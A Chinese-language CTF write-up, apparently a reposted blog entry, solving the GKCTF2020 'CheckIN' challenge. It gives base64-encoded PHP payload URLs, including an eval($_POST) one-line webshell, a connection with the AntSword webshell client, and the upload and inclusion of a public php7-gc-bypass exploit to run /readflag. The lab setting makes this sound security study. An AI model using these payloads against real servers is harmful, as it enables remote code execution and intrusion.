其他分享
首页 > 其他分享> > GKCTF2020 CheckIN Writeup

GKCTF2020 CheckIN Writeup

作者:互联网

打开实例是一段PHP代码。

代码图

通过代码没有发现反序列化函数,但是可以通过Ginkgo传参,但必须要传经过base64编码后的。上传phpinfo();试试,顺便看看php版本,将**phpinfo();**经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==

如下图

上传个一句话木马试试,将**eval($_POST[a]);**经base64编码后上传

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbYV0pOw==

使用蚁剑连接试试

连接成功

连接成功后,查看根目录

发现有flag文件,但权限不够看不了。readflag打开后乱码,于是想到执行readflag获取flag内容。但怎么执行呢,我也不会了,看wp后知道。php版本为7.3,这个版本有一个漏洞,php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux,php7.0-7.3给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php下载后进行修改,改为pwn("/readflag");,注意我这里将exploits.php文件改名为了111.php

上传挨个试,发现tmp可以上传,于是就上传到tmp中。进入tmp目录中,右键,然后点上传。上传成功后,执行文件包含。将include('/tmp/111.php');经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=aW5jbHVkZSgnL3RtcC8xMTEucGhwJyk7

得出flag

这题难就难在那个执行readflag,以后要注意不同php版本的漏洞。

标签:tmp,Writeup,CheckIN,base64,readflag,Ginkgo,GKCTF2020,php,上传
来源: https://blog.csdn.net/qq_45619909/article/details/115598299